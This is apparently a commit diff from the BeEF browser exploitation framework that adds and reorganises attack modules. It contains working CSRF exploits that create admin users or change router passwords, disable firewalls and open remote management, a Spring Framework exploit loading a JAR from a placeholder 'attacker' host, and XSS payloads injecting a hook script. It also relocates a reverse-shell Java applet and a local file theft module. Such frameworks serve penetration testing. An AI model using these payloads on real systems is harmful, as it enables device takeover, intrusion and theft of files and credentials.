axous_add_user_csrf:
enable: true
category: "Exploits"
name: "Axous <= 1.1.1 Add User CSRF"
description: "Attempts to add a user to an Axous <= 1.1.1 install (CVE-2012-2629)."
authors: ["bcoles", "Ivano Binetti"]
target:
working: ["ALL"]

31
modules/exploits/axous_1_1_1_add_user_csrf/module.rb Normal file
View File

@@ -0,0 +1,31 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Axous_add_user_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'Axous URL', 'value' => 'http://target/admin/administrators_add.php'},
{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
{ 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

41
modules/exploits/boastmachine_3_1_add_user_csrf/command.js Normal file
View File

@@ -0,0 +1,41 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var base = '<%= @base %>';
var username = '<%= @username %>';
var password = '<%= @password %>';
var email = '<%= @email %>';
var boastmachine_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
{'type':'hidden', 'name':'action', 'value':'add_user'},
{'type':'hidden', 'name':'do', 'value':'add'},
{'type':'hidden', 'name':'user_login', 'value':username},
{'type':'hidden', 'name':'user_pass', 'value':password},
{'type':'hidden', 'name':'user_name', 'value':username},
{'type':'hidden', 'name':'user_email', 'value':email},
{'type':'hidden', 'name':'blogs[]', 'value':'4'},
{'type':'hidden', 'name':'user_level', 'value':'4'},
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(boastmachine_iframe);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
boastmachine_add_user_csrf:
enable: true
category: "Exploits"
name: "boastMachine <= 3.1 Add User CSRF"
description: "Attempts to add a user to a boastMachine <= 3.1 install."
authors: ["bcoles", "Dr.NaNo"]
target:
working: ["ALL"]

31
modules/exploits/boastmachine_3_1_add_user_csrf/module.rb Normal file
View File

@@ -0,0 +1,31 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Boastmachine_add_user_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog'},
{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
{ 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

0
modules/exploits/activex_command_execution/command.js → modules/exploits/local_host/activex_command_execution/command.js
View File

2
modules/exploits/activex_command_execution/config.yaml → modules/exploits/local_host/activex_command_execution/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
activex_command_execution:
enable: true
category: "Exploits"
category: ["Exploits", "Local Host"]
name: "ActiveX Command Execution"
description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.<br><br>The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled."
authors: ["bcoles"]

0
modules/exploits/activex_command_execution/module.rb → modules/exploits/local_host/activex_command_execution/module.rb
View File

0
modules/exploits/java_payload/AppletReverseTCP-0.2.jar → modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar
View File

0
modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar → modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar
View File

0
modules/exploits/java_payload/command.js → modules/exploits/local_host/java_payload/command.js
View File

2
modules/exploits/java_payload/config.yaml → modules/exploits/local_host/java_payload/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
java_payload:
enable: true
category: "Exploits"
category: ["Exploits", "Local Host"]
name: "Java Payload"
description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br /><br />Before launching it, be sure to have the JavaPayload StagerHandler listening,<br />i.e.: java javapayload.handler.stager.StagerHandler &lt;payload&gt; &lt;IP&gt; &lt;port&gt; -- JSh<br /><br />Windows Vista is not supported."
authors: ["antisnatchor"]

0
modules/exploits/java_payload/module.rb → modules/exploits/local_host/java_payload/module.rb
View File

0
modules/exploits/mozilla_nsiprocess_interface/command.js → modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
View File

2
modules/exploits/mozilla_nsiprocess_interface/config.yaml → modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
mozilla_nsiprocess_interface:
enable: false
category: "Exploits"
category: ["Exploits", "Local Host"]
name: "Mozilla nsIProcess XPCOM Interface (Windows)"
description: "The nsIProcess XPCOM interface represents an executable process. JavaScript code with chrome privileges can use the nsIProcess interface to launch executable files. In this module, nsIProcess is combined with the Windows command prompt cmd.exe<br /><br />Any XSS injection in a chrome privileged zone (e.g. typically in Firefox extensions) allows this module to execute arbitrary commands on the victim machine."
authors: ["wade", "bcoles", "roberto.suggi@security-assessment.com", "nick.freeman@security-assessment.com"]

0
modules/exploits/mozilla_nsiprocess_interface/module.rb → modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
View File

0
modules/exploits/safari_launch_app/command.js → modules/exploits/local_host/safari_launch_app/command.js
View File

2
modules/exploits/safari_launch_app/config.yaml → modules/exploits/local_host/safari_launch_app/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
safari_launch_app:
enable: true
category: "Exploits"
category: ["Exploits", "Local Host"]
name: "Safari Launch App"
description: "Launch an application from the victim machine.<br/><br/>See CVE-2011-3230 for more details.<br /><br />Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel."
authors: ["antisnatchor"]

0
modules/exploits/safari_launch_app/module.rb → modules/exploits/local_host/safari_launch_app/module.rb
View File

0
modules/exploits/window_mail_client_dos/command.js → modules/exploits/local_host/window_mail_client_dos/command.js
View File

2
modules/exploits/window_mail_client_dos/config.yaml → modules/exploits/local_host/window_mail_client_dos/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
windows_mail_client_dos:
enable: true
category: "Exploits"
category: ["Exploits", "Local Host"]
name: "Windows Mail Client DoS"
description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.<br /><br />Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's also vulnerable on Windows 7 SP2).<br /><br />The protocol handler used will be: nntp."
authors: ["bcoles"]

0
modules/exploits/window_mail_client_dos/module.rb → modules/exploits/local_host/window_mail_client_dos/module.rb
View File

4
modules/exploits/router/comtrend_ct5367_csrf/command.js
View File

@@ -18,12 +18,12 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', gateway + "/password.cgi");
form.setAttribute('action', gateway + "password.cgi");
form.setAttribute('method', 'post');
var input = null;

2
modules/exploits/router/comtrend_ct5624_csrf/command.js
View File

@@ -18,7 +18,7 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);

2
modules/exploits/router/dlink_dsl500t_csrf/command.js
View File

@@ -17,7 +17,7 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST",
var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
{'type':'hidden', 'name':'security:settings/password', 'value':passwd},

2
modules/exploits/router/huawei_smartax_mt880/command.js
View File

@@ -19,7 +19,7 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
huawei_smartax_mt880_iframe.setAttribute('src', gateway+"/Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

47
modules/exploits/router/virgin_superhub_csrf/command.js Normal file
View File

@@ -0,0 +1,47 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var port = '<%= @port %>';
var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
]);
var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
]);
var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(virgin_superhub_iframe1);
document.body.removeChild(virgin_superhub_iframe2);
document.body.removeChild(virgin_superhub_iframe3);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/router/virgin_superhub_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
virgin_superhub_csrf:
enable: true
category: ["Exploits", "Router"]
name: "Virgin Superhub CSRF"
description: "Attempts to enable remote administration, disable the firewall, and change the admin password on a Virgin Superhub router."
authors: ["bcoles", "n0x00"]
target:
working: ["ALL"]

30
modules/exploits/router/virgin_superhub_csrf/module.rb Normal file
View File

@@ -0,0 +1,30 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Virgin_superhub_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.1/'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'},
{'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

32
modules/exploits/spring_framework_malicious_jar/command.js Normal file
View File

@@ -0,0 +1,32 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
jar_file = "<%= @jar_file %>";
form_controller = "<%= @form_controller %>";
uri = form_controller+"?class.classLoader.URLs[0]=jar:"+jar_file;
var spring_iframe = beef.dom.createInvisibleIframe();
spring_iframe.setAttribute('src', uri);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=exploit attempted");
cleanup = function() {
document.body.removeChild(spring_iframe);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/spring_framework_malicious_jar/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
spring_framework_malicious_jar:
enable: true
category: "Exploits"
name: "Spring Framework Malicious Jar Exploit"
description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).<br/>Specify the URL for a form controller on the target and the URL for your malicious JAR file.<br/>For more information see: http://www.exploit-db.com/exploits/13918/<br/><br/>Versions Affected:<br/>3.0.0 to 3.0.2<br/>2.5.0 to 2.5.6.SEC01 (community releases)<br/>2.5.0 to 2.5.7 (subscription customers)"
authors: ["bcoles"]
target:
working: ["ALL"]

29
modules/exploits/spring_framework_malicious_jar/module.rb Normal file
View File

@@ -0,0 +1,29 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Spring_framework_malicious_jar < BeEF::Core::Command
def self.options
return [
{'name' => 'form_controller', 'ui_label' => 'Form Controller URL', 'value' => 'http://target/path/to/form/controller'},
{'name' => 'jar_file', 'ui_label' => 'Malicious JAR file URL', 'value' => 'http://attacker/path/to/attack.jar!/'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

26
modules/exploits/xss/cisco_collaboration_server_5_xss/command.js Normal file
View File

@@ -0,0 +1,26 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var uri = '<%= @uri.gsub(/'/, "\\'") %>';
var cisco_collaboration_iframe = beef.dom.createInvisibleIframe();
cisco_collaboration_iframe.setAttribute('src', uri);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
});

25
modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
cisco_collaboration_server_5_xss:
enable: true
category: ["Exploits", "XSS"]
name: "Cisco Collaboration Server 5 XSS"
description: "Attempts to hook Cisco Collaboration Server 5 using XSS.<br/>For more information see: http://www.exploit-db.com/exploits/11403/"
authors: ["bcoles", "s4squatch"]
target:
working: ["ALL"]

33
modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb Normal file
View File

@@ -0,0 +1,33 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Cisco_collaboration_server_5_xss < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
return [
{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest="><script src="'+hook_uri+'"></script>'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

26
modules/exploits/xss/serendipity_1.6_xss/command.js Normal file
View File

@@ -0,0 +1,26 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var uri = '<%= @uri.gsub(/'/, "\\'") %>';
var serendipity_iframe = beef.dom.createInvisibleIframe();
serendipity_iframe.setAttribute('src', uri);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
});

25
modules/exploits/xss/serendipity_1.6_xss/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
serendipity_1_6_xss:
enable: true
category: ["Exploits", "XSS"]
name: "Serendipity <= 1.6 XSS"
description: "Attempts to hook Serendipity <= 1.6 using XSS.<br/>For more information see: http://www.exploit-db.com/exploits/18884/"
authors: ["bcoles", "Stefan Schurtz"]
target:
working: ["ALL"]

33
modules/exploits/xss/serendipity_1.6_xss/module.rb Normal file
View File

@@ -0,0 +1,33 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Serendipity_1_6_xss < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
return [
{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"</script><script src="'+hook_uri+'"></script>'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

2
modules/exploits/zenoss_add_user_csrf/config.yaml
View File

@@ -18,7 +18,7 @@ beef:
zenoss_add_user_csrf:
enable: true
category: "Exploits"
name: "Zenoss Add User CSRF"
name: "Zenoss <= 3.2.1 Add User CSRF"
description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:

2
modules/exploits/zenoss_daemon_csrf/config.yaml
View File

@@ -18,7 +18,7 @@ beef:
zenoss_daemon_csrf:
enable: true
category: "Exploits"
name: "Zenoss Daemon CSRF"
name: "Zenoss <= 3.2.1 Daemon CSRF"
description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:

2
modules/host/detect_google_desktop/config.yaml
View File

@@ -24,5 +24,5 @@ beef:
target:
not_working:
ALL:
os: ["iPhone"]
os: ["iOS"]
working: ["ALL"]

2
modules/host/get_system_info/config.yaml
View File

@@ -24,6 +24,6 @@ beef:
target:
not_working:
ALL:
os: ["iPhone", "Macintosh"]
os: ["iOS", "Macintosh"]
working: ["O", "FF", "S", "IE"]
user_notify: ["C"]

2
modules/host/hook_default_browser/config.yaml
View File

@@ -24,6 +24,6 @@ beef:
target:
not_working:
ALL:
os: ["iPhone"]
os: ["iOS"]
working: ["All"]
user_notify: ["FF", "C"]

2
modules/host/iphone_tel/config.yaml
View File

@@ -24,7 +24,7 @@ beef:
target:
user_notify:
S:
os: ["iPhone"]
os: ["iOS"]
not_working:
ALL:
os: ["All"]

4
modules/misc/local_file_theft/config.yaml
View File

@@ -23,7 +23,7 @@ beef:
enable: true
category: "Misc"
name: "Local File Theft"
description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme. This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in safari from the your localfile system."
description: "JavaScript may have filesystem access if we are running from a local resource and using the file:// scheme.<br/>This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in Safari from the your localfile system."
authors: ["mh"]
target:
working: ["All"]
working: ["S"]

19
update-beef Executable file
View File

@@ -0,0 +1,19 @@
#!/bin/bash
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
echo Updating...
git pull